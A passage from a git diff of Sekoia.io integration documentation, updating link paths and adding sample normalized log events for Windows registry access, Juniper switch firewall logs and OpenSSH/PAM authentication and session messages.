"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bc2f61ad70971869b242fc1cb445b98bad50074a", + "https://www.openssl.org/news/secadv/20230419.txt", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=02ac9c9420275868472f33b01def01218742b8bb" + ], + "remediation": { + "desc": "Remediation is available. Please refer to the Fixed version in the vulnerability details section above.For detailed remediation guidance for each of the affected packages, refer to the vulnerabilities section of the detailed finding JSON." + }, + "vendor_name": "NVD" + } + ] + } + ``` + + + +=== "test_windows_resource_activity_1" + + + ```json + { + "activity_id": 1, + "activity_name": "Access", + "actor": { + "process": { + "file": { + "name": "services.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\services.exe", + "type": "Regular File", + "type_id": 1 + }, + "pid": 532 + }, + "session": { + "uid": "0x3e7" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "SOI", + "name": "SZUSOIDC1$", + "uid": "NT AUTHORITY\\SYSTEM" + } + }, + "category_name": "System Activity", + "category_uid": 1, + "class_name": "Windows Resource Activity", + "class_uid": 201003, + "device": { + "hostname": "szusoidc1.soi.dir.acme080.com", + "os": { + "name": "Windows", + "type": "Windows", + "type_id": 100 + }, + "type": "Unknown", + "type_id": 0 + }, + "message": "An attempt was made to access an object.", + "metadata": { + "original_time": "01/14/2015 08:30:54 PM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "05e90f2c-5be6-484c-aefb-f8e6f591bd2c", + "version": "1.0.0-rc.2" + }, + "severity": "Informational", + "severity_id": 1, + "status": "Success", + "status_id": 1, + "time": 1421285454000, + "type_name": "Windows Resource Activity: Access", + "type_uid": 101001, + "unmapped": { + "Access Mask": "0x2", 
+ "Access Request Information": { + "Accesses": "Set key value" + }, + "CaseID": "AD_4663", + "EventCode": "4663", + "EventType": "0", + "Object": { + "Object Server": "Security" + }, + "OpCode": "Info", + "RecordNumber": "989202992", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Registry" + }, + "win_resource": { + "name": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\EventLog\\Security", + "type": "Key", + "type_id": 25, + "uid": "0x564" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md b/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md index 439a07cb8c..a551974302 100644 --- a/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md +++ b/_shared_content/operations_center/integrations/generated/ab25af2e-4916-40ba-955c-34d2301c1f51.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "combined.json" diff --git a/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md b/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md index 972e726a40..ee06a14fb6 100644 --- a/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md +++ b/_shared_content/operations_center/integrations/generated/acd3374a-9738-4650-9d20-bd0a22daac40.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert.json" diff --git a/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md b/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md index 154d73ea08..be6f6bff0f 100644 --- a/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md +++ b/_shared_content/operations_center/integrations/generated/ae62a8c4-11f8-4aea-af5b-6968f8ac04ba.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_certificate_create.json" diff --git a/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md b/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md index 26e1019d09..874fafa104 100644 --- a/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md +++ b/_shared_content/operations_center/integrations/generated/aeb7d407-db57-44b2-90b6-7df6738d5d7f.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_ignoring_request.json" diff --git a/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md index 05a6ded5e6..cc40eefe0d 100644 --- a/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md +++ b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. 
@@ -23,10 +23,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_network_1_1.json" @@ -233,7 +232,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -253,3 +252,6 @@ The following table lists the fields that are extracted, normalized under the EC |`source.mac` | `keyword` | MAC address of the source. | |`source.port` | `long` | Port of the source. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Juniper/juniper-switches). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c_sample.md b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c_sample.md new file mode 100644 index 0000000000..9217e66a1a --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/b1545bb3-6f55-4ba4-ac80-d649040a127c_sample.md 
@@ -0,0 +1,38 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_network_1_1" + + ``` + FW: et-1/1/1.2505 D 09c9:0800 4a:74:92:52:6c:20 -> bd:83:17:63:d5:f7 tcp 1.2.3.4 5.6.7.8 46736 3405 (1 packets) + ``` + + + +=== "test_network_1_2" + + ``` + FW: et-1/1/1.2505 D 09c9:0800 4a:74:92:52:6c:20 -> 71:89:a4:34:a0:b4 tcp 1.2.3.4 5.6.7.8 60000 29822 (1 packets) + ``` + + + +=== "test_network_2" + + ``` + FW: lsi.0 D 4a:74:92:52:6c:20 bd:83:17:63:d5:f7 8100:9 8847:5dc 13b UDP 1.2.3.4 5.6.7.8 52767 161 (1 packets) + ``` + + + +=== "test_network_3" + + ``` + FW: ge-0/0/0.0 A icmp 1.2.3.4 5.6.7.8 8 0 (1 packets) + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md b/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md index a25ad7f7fd..7335e69047 100644 --- a/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md +++ b/_shared_content/operations_center/integrations/generated/b23668b2-5716-4432-9af7-bc4f81ad6df3.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ipfix.json" diff --git a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md index 5499c79997..4cca3b952f 100644 --- a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md +++ b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f.md 
@@ -17,15 +17,15 @@ In details, the following table denotes the type of events produced by this inte | Name | Values | | ---- | ------ | | Kind | `` | -| Category | `authentication`, `network`, `session` | -| Type | `end`, `protocol`, `start` | +| Category | `authentication`, `configuration`, `library`, `network`, `session` | +| Type | `end`, `info`, `protocol`, `start` | ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "accepted_google_authenticator.json" 
@@ -337,6 +337,107 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "accepted_rsa.json" + + ```json + + { + "message": " Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /home/star/.ssh/authorized_keys:2", + "event": { + "category": [ + "authentication" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "session", + "outcome": "success", + "outcome_reason": "Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /home/star/.ssh/authorized_keys:2", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "accepted_rsa_2.json" + + ```json + + { + "message": " Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /usr/local/nagios/.ssh/authorized_keys:1", + "event": { + "category": [ + "authentication" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "session", + "outcome": "success", + "outcome_reason": "Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /usr/local/nagios/.ssh/authorized_keys:1", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "auth_method_disabled.json" + + ```json + + { + "message": "main: sshd: ssh-rsa algorithm is disabled", + "event": { + "category": [ + "configuration" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "outcome_reason": "main: sshd: ssh-rsa algorithm is disabled" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + === "authentication_attempts_exceeded.json" ```json 
@@ -592,6 +693,50 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "connection_closed_2.json" + + ```json + + { + "message": " Connection closed by 127.0.0.1", + "event": { + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "Connection closed by 127.0.0.1", + "target": "user", + "type": "close" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + } + } + + ``` + + === "connection_closed_authenticating_user.json" ```json @@ -844,6 +989,56 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "connection_from.json" + + ```json + + { + "message": " Connection from 127.0.0.1 port 58752 on 127.0.0.1 port 22", + "event": { + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "Connection from 127.0.0.1 port 58752 on 127.0.0.1 port 22", + "target": "user", + "type": "open" + }, + "destination": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 22 + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 58752 + } + } + + ``` + + === "connection_reset.json" ```json 
@@ -1755,12 +1950,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "pam_more_auth_failure.json" +=== "pam_faillock_consecutive_failures.json" ```json { - "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", + "message": "pam_faillock(sshd:auth): Consecutive login failures for user JDOE account temporarily locked", "event": { "category": [ "authentication" @@ -1773,7 +1968,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": { "name": "sshd:auth", "outcome": "failure", - "outcome_reason": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", + "outcome_reason": "Consecutive login failures for user JDOE account temporarily locked", "target": "user", "type": "authentication" }, @@ -1786,51 +1981,44 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "name": "sshd" }, "related": { - "ip": [ - "1.2.3.4" - ], "user": [ - "root" + "JDOE" ] }, "source": { - "address": "1.2.3.4", - "ip": "1.2.3.4", "user": { - "name": "root" + "name": "JDOE" } }, "user": { - "euid": "0", - "id": "0", - "name": "root" + "name": "JDOE" } } ``` -=== "pam_service_ignoring_max_retries.json" +=== "pam_faillock_user_unknown.json" ```json { - "message": "PAM service(sshd) ignoring max retries; 6 > 3", + "message": "pam_faillock(sshd:auth): User unknown", "event": { "category": [ - "session" + "authentication" ], "outcome": "failure", "type": [ - "start" + "end" ] }, "action": { - "name": "connection", + "name": "sshd:auth", "outcome": "failure", - "outcome_reason": "ignoring max retries; 6 > 3", + "outcome_reason": "User unknown", "target": "user", - "type": "open" + "type": "authentication" }, "observer": { "product": "openssh", 
@@ -1845,27 +2033,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "pam_session_closed.json" +=== "pam_faulty_module.json" ```json { - "message": " pam_unix(sshd:session): session closed for user ubuntu", + "message": "PAM adding faulty module: pam_cracklib.so", "event": { "category": [ - "session" + "library" ], - "outcome": "success", + "outcome": "failure", "type": [ - "end" + "start" ] }, "action": { - "name": "sshd:session", - "outcome": "success", - "outcome_reason": "pam_unix(sshd:session): session closed for user ubuntu", - "target": "user", - "type": "close" + "outcome": "failure", + "outcome_reason": "PAM adding faulty module: pam_cracklib.so" + }, + "dll": { + "name": "pam_cracklib.so" }, "observer": { "product": "openssh", @@ -1874,46 +2062,33 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "process": { "name": "sshd" - }, - "related": { - "user": [ - "ubuntu" - ] - }, - "source": { - "user": { - "name": "ubuntu" - } - }, - "user": { - "name": "ubuntu" } } ``` -=== "pam_session_opened.json" +=== "pam_more_auth_failure.json" ```json { - "message": " pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", "event": { "category": [ - "session" + "authentication" ], - "outcome": "success", + "outcome": "failure", "type": [ - "start" + "end" ] }, "action": { - "name": "sshd:session", - "outcome": "success", - "outcome_reason": "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "name": "sshd:auth", + "outcome": "failure", + "outcome_reason": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", "target": "user", - "type": "open" + "type": "authentication" }, "observer": { "product": "openssh", 
@@ -1924,40 +2099,213 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "name": "sshd" }, "related": { + "ip": [ + "1.2.3.4" + ], "user": [ - "ubuntu" + "root" ] }, "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", "user": { - "name": "ubuntu" + "name": "root" } }, "user": { - "name": "ubuntu" + "euid": "0", + "id": "0", + "name": "root" } } ``` -=== "pam_session_opened_2.json" +=== "pam_service_ignoring_max_retries.json" ```json { - "message": " pam_unix(sshd:session): session opened for user jdoe(uid=10357) by (uid=0)", + "message": "PAM service(sshd) ignoring max retries; 6 > 3", "event": { "category": [ "session" ], - "outcome": "success", + "outcome": "failure", "type": [ "start" ] }, "action": { - "name": "sshd:session", + "name": "connection", + "outcome": "failure", + "outcome_reason": "ignoring max retries; 6 > 3", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "pam_session_closed.json" + + ```json + + { + "message": " pam_unix(sshd:session): session closed for user ubuntu", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "sshd:session", + "outcome": "success", + "outcome_reason": "pam_unix(sshd:session): session closed for user ubuntu", + "target": "user", + "type": "close" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "user": [ + "ubuntu" + ] + }, + "source": { + "user": { + "name": "ubuntu" + } + }, + "user": { + "name": "ubuntu" + } + } + + ``` + + +=== "pam_session_failed_to_create.json" + + ```json + + { + "message": " pam_systemd(sshd:session): Failed to create session: Maximum number of sessions (8192) reached, refusing further sessions.", + "event": { + "category": [ + "session" + ], + 
"outcome": "failure", + "type": [ + "end" + ] + }, + "action": { + "name": "connection", + "outcome": "failure", + "outcome_reason": "Maximum number of sessions (8192) reached, refusing further sessions.", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "pam_session_opened.json" + + ```json + + { + "message": " pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "sshd:session", + "outcome": "success", + "outcome_reason": "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "user": [ + "ubuntu" + ] + }, + "source": { + "user": { + "name": "ubuntu" + } + }, + "user": { + "name": "ubuntu" + } + } + + ``` + + +=== "pam_session_opened_2.json" + + ```json + + { + "message": " pam_unix(sshd:session): session opened for user jdoe(uid=10357) by (uid=0)", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "sshd:session", "outcome": "success", "outcome_reason": "pam_unix(sshd:session): session opened for user jdoe(uid=10357) by (uid=0)", "target": "user", 
@@ -1991,6 +2339,42 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "pam_unable_to_dlopen.json" + + ```json + + { + "message": "PAM unable to dlopen(pam_cracklib.so): /lib/security/pam_cracklib.so: cannot open shared object file: No such file or directory", + "event": { + "category": [ + "library" + ], + "outcome": "failure", + "type": [ + "start" + ] + }, + "action": { + "outcome": "failure", + "outcome_reason": "cannot open shared object file: No such file or directory" + }, + "dll": { + "name": "pam_cracklib.so", + "path": "/lib/security/pam_cracklib.so" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + === "pam_winbind_granted_access.json" ```json @@ -2045,6 +2429,65 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "postponed_publickey.json" + + ```json + + { + "message": " Postponed publickey for star from 127.0.0.1 port 44690 ssh2 [preauth]", + "event": { + "category": [ + "authentication" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "session", + "outcome": "success", + "outcome_reason": "Postponed publickey for star from 127.0.0.1 port 44690 ssh2 [preauth]", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "openssh": { + "auth": { + "method": "publickey" + } + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "star" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 44690, + "user": { + "name": "star" + } + }, + "user": { + "name": "star" + } + } + + ``` + + === "received_disconnect_bye_bye.json" ```json 
@@ -2225,7 +2668,139 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "unable_to_negociate.json" +=== "received_disconnect_user_2.json" + + ```json + + { + "message": " Received disconnect from 127.0.0.1: 11: disconnected by user", + "event": { + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "disconnected by user", + "target": "user", + "type": "close" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + } + } + + ``` + + +=== "starting_session.json" + + ```json + + { + "message": " Starting session: command for nagios from 127.0.0.1 port 58752 id 0", + "event": { + "outcome": "success" + }, + "action": { + "outcome_reason": "Starting session: command for nagios from 127.0.0.1 port 58752 id 0" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "nagios" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 58752, + "user": { + "name": "nagios" + } + }, + "user": { + "name": "nagios" + } + } + + ``` + + +=== "starting_session_2.json" + + ```json + + { + "message": " Starting session: command for star from 127.0.0.1 port 44690 id 0", + "event": { + "outcome": "success" + }, + "action": { + "outcome_reason": "Starting session: command for star from 127.0.0.1 port 44690 id 0" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "star" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 
44690, + "user": { + "name": "star" + } + }, + "user": { + "name": "star" + } + } + + ``` + + +=== "unable_to_negotiate.json" ```json @@ -2270,6 +2845,51 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "unable_to_negotiate_2.json" + + ```json + + { + "message": " Unable to negotiate with 1.2.3.4 port 5228: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]", + "event": { + "category": [ + "session" + ], + "outcome": "failure", + "type": [ + "end" + ] + }, + "action": { + "name": "negotiate", + "outcome": "failure", + "outcome_reason": "Unable to negotiate with 1.2.3.4 port 5228: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 5228 + } + } + + ``` + + === "user_not_allowed.json" ```json @@ -2323,6 +2943,55 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "user_on_pid.json" + + ```json + + { + "message": " User child is on pid 60225", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "is on pid 60225", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd", + "pid": 60225 + }, + "related": { + "user": [ + "child" + ] + }, + "source": { + "user": { + "name": "child" + } + }, + "user": { + "name": "child" + } + } + + ``` + + 
@@ -2333,6 +3002,10 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| |`action.target` | `keyword` | | +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.port` | `long` | Port of the destination. | +|`dll.name` | `keyword` | Name of the library. | +|`dll.path` | `keyword` | Full file path of the library. | |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.outcome` | `keyword` | The outcome of the event. The lowest level categorization field in the hierarchy. | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | @@ -2342,6 +3015,7 @@ The following table lists the fields that are extracted, normalized under the EC |`observer.vendor` | `keyword` | Vendor name of the observer. | |`openssh.auth.method` | `keyword` | | |`process.name` | `keyword` | Process name. | +|`process.pid` | `long` | Process id. | |`source.domain` | `keyword` | The domain name of the source. | |`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | diff --git a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md index 171ff43e34..7129fe380f 100644 --- a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md +++ b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md 
